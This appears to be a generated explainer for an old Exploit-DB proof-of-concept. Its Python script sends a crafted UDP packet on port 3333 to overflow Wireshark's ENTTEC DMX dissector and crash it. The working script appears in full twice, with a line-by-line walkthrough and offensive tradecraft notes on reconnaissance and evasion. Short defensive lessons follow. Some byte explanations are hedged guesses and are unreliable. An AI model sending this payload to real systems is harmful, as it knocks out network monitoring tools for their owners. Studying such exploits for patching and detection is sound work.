Wireshark ENTTEC DMX Data RLE Buffer Overflow Explained

What this paper is

This paper is a Proof-of-Concept (PoC) exploit for a buffer overflow vulnerability in Wireshark. Specifically, it targets how Wireshark handles ENTTEC DMX data received over UDP. The vulnerability allows an attacker to send specially crafted data that can cause Wireshark to crash, leading to a Denial-of-Service (DoS) condition.

Simple technical breakdown

Wireshark is a network protocol analyzer. It listens to network traffic and decodes it. The ENTTEC DMX protocol is often used for lighting control. This exploit sends a malformed UDP packet containing ENTTEC DMX data to a target machine running Wireshark. The malformed data is designed to be larger than the buffer allocated to store it within Wireshark's processing logic. When Wireshark tries to write this oversized data into the small buffer, it overflows, overwriting adjacent memory. This overwriting corrupts critical program data or instructions, causing Wireshark to crash.

Complete code and payload walkthrough

The provided script is a Python program that constructs and sends a UDP packet.

#!/usr/bin/env python

# Wireshark ENTTEC DMX Data (UDP) Buffer Overflow PoC
# by non-customers crew in 2010
# http://rock-madrid.com/

import socket, sys

try:
  host = sys.argv[1]
except:
  print "usage: " + sys.argv[0] + " <host>"
  sys.exit(2)

port = 3333
addr = (host, port)

data  = "ESDD\x10\x20\x04"
data += "\x00\x0c"
data += "\xfe\xff\x41"
data += "\xfe\xff\x42"
data += "\xfe\xff\x43"
data += "\xfe\xff\x44"

udps = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
try:
  udps.sendto(data, addr)
except:
  print "can't lookup host"
  sys.exit(1)

udps.close()
sys.exit(0)

Let's break down the code and the data payload:

• #!/usr/bin/env python: This is a shebang line, indicating that the script should be executed using the Python interpreter.

• Comments: The lines starting with # provide context about the script's origin, purpose, and author.

• import socket, sys: Imports necessary Python modules.

  • socket: For network communication (creating sockets, sending data).
  • sys: For accessing command-line arguments and exiting the script.

• try...except block for sys.argv[1]:

  • Purpose: This block attempts to get the target host's IP address or hostname from the first command-line argument (sys.argv[1]).
  • Behavior: If no argument is provided, sys.argv[1] will raise an IndexError. The except block catches this, prints a usage message, and exits the script with an error code.
  • Mapping: sys.argv[1] -> Target host input.

• host = sys.argv[1]: Assigns the first command-line argument to the host variable.

• port = 3333: Sets the target UDP port to 3333. This is a common port associated with ENTTEC DMX devices.

• addr = (host, port): Creates a tuple representing the target address (host and port) for the sendto function.

• data = "ESDD\x10\x20\x04": This is the beginning of the crafted payload.

  • ESDD: This is likely a magic string or identifier for the ENTTEC DMX protocol or a specific message type.
  • \x10\x20\x04: These bytes represent specific fields within the DMX packet structure. The exact meaning depends on the ENTTEC DMX protocol specification, but in the context of a buffer overflow, they are part of the data that will be processed. The values 0x10, 0x20, 0x04 might indicate packet length, type, or other control information.

• data += "\x00\x0c": Appends more data to the payload.

  • \x00\x0c: This could represent a length field. \x0c is decimal 12. This might indicate that the subsequent data block has a length of 12 bytes.

• data += "\xfe\xff\x41": Appends a segment of data.

  • \xfe\xff: These bytes are often used in buffer overflow exploits as padding or to control the overflow. \xff is the maximum byte value, and \xfe is just below it.
  • \x41: This is the ASCII character 'A'. In exploits, this is commonly used as a "fill" character to easily identify overwritten memory.

• data += "\xfe\xff\x42": Appends another segment.

  • \xfe\xff: Padding/control bytes.
  • \x42: ASCII character 'B'.

• data += "\xfe\xff\x43": Appends another segment.

  • \xfe\xff: Padding/control bytes.
  • \x43: ASCII character 'C'.

• data += "\xfe\xff\x44": Appends the final segment of the crafted data.

  • \xfe\xff: Padding/control bytes.
  • \x44: ASCII character 'D'.

  Overall data payload structure:
  The data variable is constructed to be a UDP packet payload. It starts with a protocol identifier (ESDD), followed by some control bytes (\x10\x20\x04), a length indicator (\x00\x0c), and then several segments of padding/control bytes (\xfe\xff) followed by distinct characters (A, B, C, D). The critical aspect for the overflow is that the total size of this data payload, when processed by Wireshark's DMX dissector, exceeds the allocated buffer. The specific values of \xfe\xff and the characters A-D are chosen to overwrite memory in a predictable way, leading to a crash. The exact buffer size and the precise overflow mechanism are not fully detailed in the PoC but are implied by the payload construction.

• udps = socket.socket(socket.AF_INET, socket.SOCK_DGRAM):

  • Purpose: Creates a new UDP socket.
  • AF_INET: Specifies the address family as IPv4.
  • SOCK_DGRAM: Specifies the socket type as datagram (UDP).

• try...except block for udps.sendto():

  • Purpose: Attempts to send the crafted data to the target address.
  • Behavior: If there's an issue resolving the host (e.g., DNS failure), it prints an error and exits.
  • udps.sendto(data, addr): Sends the data payload over the UDP socket to the specified addr. This is the action that triggers the vulnerability.

• udps.close(): Closes the UDP socket, releasing system resources.

• sys.exit(0): Exits the script successfully.

Mapping list:

• #!/usr/bin/env python: Script interpreter declaration.
• import socket, sys: Module imports for network and system operations.
• sys.argv[1]: Command-line argument for target host.
• port = 3333: Target UDP port for ENTTEC DMX.
• addr = (host, port): Target IP address and port tuple.
• data = "ESDD\x10\x20\x04": Start of the crafted UDP payload (protocol identifier and initial control bytes).
• data += "\x00\x0c": Appends a length field to the payload.
• data += "\xfe\xff\x41": Appends a segment of padding/control bytes and a fill character ('A').
• data += "\xfe\xff\x42": Appends a segment of padding/control bytes and a fill character ('B').
• data += "\xfe\xff\x43": Appends a segment of padding/control bytes and a fill character ('C').
• data += "\xfe\xff\x44": Appends a segment of padding/control bytes and a fill character ('D').
• socket.socket(socket.AF_INET, socket.SOCK_DGRAM): UDP socket creation.
• udps.sendto(data, addr): Sending the malicious UDP packet.
• udps.close(): Socket cleanup.
• sys.exit(0): Successful script termination.

Shellcode/Payload Segments:

There is no explicit shellcode in the traditional sense (code to be executed on the target). The "payload" here is the data variable, which is designed to cause a crash (Denial of Service) by overflowing a buffer within Wireshark's DMX dissector. The bytes \xfe\xff and the characters A, B, C, D are used to overwrite memory. The specific sequence and length are crafted to trigger the overflow and crash.

Practical details for offensive operations teams

• Required Access Level: No elevated privileges are required on the target system. The exploit is delivered over the network via UDP.
• Lab Preconditions:
  • A target machine with Wireshark installed and running.
  • Wireshark must be configured to capture or analyze traffic on UDP port 3333, or the target machine must be listening on this port for DMX data.
  • Network connectivity from the attacker's machine to the target on UDP port 3333.
  • The specific version of Wireshark vulnerable to this overflow must be identified. This PoC does not specify the vulnerable version, but it was published in 2011, suggesting older versions are affected.
• Tooling Assumptions:
  • Python interpreter installed on the attacker's machine.
  • Basic network access and command-line familiarity.
• Execution Pitfalls:
  • Firewalls: Network firewalls blocking UDP traffic on port 3333 will prevent the exploit from reaching the target.
  • Wireshark Configuration: If Wireshark is not actively capturing or dissecting UDP traffic on port 3333, the packet may be ignored, and no crash will occur.
  • Protocol Variations: The ENTTEC DMX protocol might have variations or newer versions that are not vulnerable. The PoC relies on a specific parsing behavior.
  • Target System Load: High network load or other system processes might interfere with the timing or detection of the crash.
  • Wireshark Updates: Modern versions of Wireshark are likely patched and will not be vulnerable.
• Tradecraft Considerations:
  • Reconnaissance: Identify target systems running Wireshark and determine if they are actively monitoring UDP port 3333. Port scanning and service version detection might be useful.
  • Payload Delivery: The UDP packet is sent directly. There's no complex delivery mechanism.
  • Evasion: UDP traffic is generally less scrutinized than TCP. However, the specific packet structure might be flagged by deep packet inspection (DPI) systems if signatures exist. The PoC itself is simple and unlikely to have advanced evasion techniques.
  • Post-Exploitation (DoS): The primary outcome is a crash. This can be used to disrupt operations, but it does not grant any further access or control.

Where this was used and when

• Context: This exploit targets Wireshark's handling of ENTTEC DMX data. This protocol is commonly used in stage lighting, theatrical productions, and entertainment venues.
• Approximate Years/Dates: The exploit was published on January 3, 2011, by "non-customers crew" in 2010. This indicates the vulnerability was likely discovered and weaponized around 2010 or earlier. It would have been relevant for older versions of Wireshark.

Defensive lessons for modern teams

• Patch Management: Regularly update network analysis tools like Wireshark to the latest stable versions. Vulnerabilities in dissectors are common and are usually patched quickly.
• Network Segmentation: Isolate critical network infrastructure and sensitive systems. If Wireshark is used for monitoring, ensure it's on an appropriate network segment and not directly exposed to untrusted traffic.
• Intrusion Detection/Prevention Systems (IDS/IPS): Configure IDS/IPS to monitor for malformed packets or unusual UDP traffic patterns, especially on ports associated with control protocols. Signatures for known dissector vulnerabilities can be effective.
• Least Privilege for Network Tools: If Wireshark needs to run on a production system, ensure it runs with the minimum necessary privileges. While this exploit causes a DoS, other vulnerabilities in dissectors could potentially lead to code execution.
• Traffic Filtering: Implement firewall rules to block unnecessary UDP traffic on sensitive ports, especially if the DMX protocol is not expected on those segments.

ASCII visual (if applicable)

This exploit is a simple network packet injection. An ASCII visual might not be strictly necessary for understanding the flow, but here's a representation of the packet being sent:

+-----------------+       +-----------------+       +-----------------+
| Attacker System | ----> | Network (UDP)   | ----> | Target System   |
| (Python Script) |       | Port 3333       |       | (Wireshark)     |
+-----------------+       +-----------------+       +-----------------+
        |                                                   |
        | Sends crafted UDP packet:                         | Receives packet
        | "ESDD\x10\x20\x04\x00\x0c\xfe\xffA\xfe\xffB\xfe\xffC\xfe\xffD" |
        |                                                   | Processes data
        |                                                   | (Buffer Overflow occurs)
        |                                                   | -> Wireshark Crashes (DoS)

Source references

• Paper ID: 15898
• Paper Title: Wireshark - ENTTEC DMX Data RLE Buffer Overflow
• Author: non-customers crew
• Published: 2011-01-03
• Keywords: Multiple,dos
• Paper URL: https://www.exploit-db.com/papers/15898
• Raw URL: https://www.exploit-db.com/raw/15898
• SecurityFocus BID: 45634 (referenced in the original paper)

Original Exploit-DB Content (Verbatim)

# source: https://www.securityfocus.com/bid/45634/info

#!/usr/bin/env python

# Wireshark ENTTEC DMX Data (UDP) Buffer Overflow PoC
# by non-customers crew in 2010
# http://rock-madrid.com/

import socket, sys

try:
  host = sys.argv[1]
except:
  print "usage: " + sys.argv[0] + " <host>"
  sys.exit(2)

port = 3333
addr = (host, port)

data  = "ESDD\x10\x20\x04"
data += "\x00\x0c"
data += "\xfe\xff\x41"
data += "\xfe\xff\x42"
data += "\xfe\xff\x43"
data += "\xfe\xff\x44"

udps = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
try:
  udps.sendto(data, addr)
except:
  print "can't lookup host"
  sys.exit(1)

udps.close()
sys.exit(0)